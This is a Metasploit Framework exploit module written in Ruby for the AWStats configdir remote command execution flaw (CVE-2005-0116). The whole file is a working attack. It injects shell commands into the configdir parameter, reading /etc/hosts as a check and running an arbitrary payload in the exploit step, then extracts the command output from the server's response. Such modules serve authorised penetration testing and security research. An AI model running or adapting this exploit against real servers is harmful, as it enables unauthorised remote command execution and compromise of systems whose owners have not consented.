##
# $Id: awstats_configdir_exec.rb 4529 2007-03-12 01:08:18Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Unix::Webapp::AWStats_ConfigDir_Execution < Msf::Exploit::Remote

	include Exploit::Remote::Tcp
	include Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'AWStats configdir Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 
				are vulnerable.		
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4529 $',
			'References'     =>
				[
					['OSVDB', '13002'],
					['BID', '12298'],
					['CVE', '2005-0116'],
					['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],
					['MIL', '8'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 15 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' => 
			{
				'configdir' => '|echo;cat /etc/hosts;echo|'
			}
		}, 25)
		
		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end
		
		return Exploit::CheckCode::Safe
	end
		

	def exploit
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' => 
			{
				'configdir' => %Q!|echo 'YYY'; #{payload.encoded}; echo 'YYY'|!
			}
		}, 25)
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
			print("")
			
			m = res.body.match(/YYY(.*)YYY/)
			
			if (m)
				print_status("Command output from the server:")
				print(m[1])
			else
				print_status("This server may not be vulnerable")
			end
			
		else
			print_status("No response from the server")
		end
	end
	
end
end	
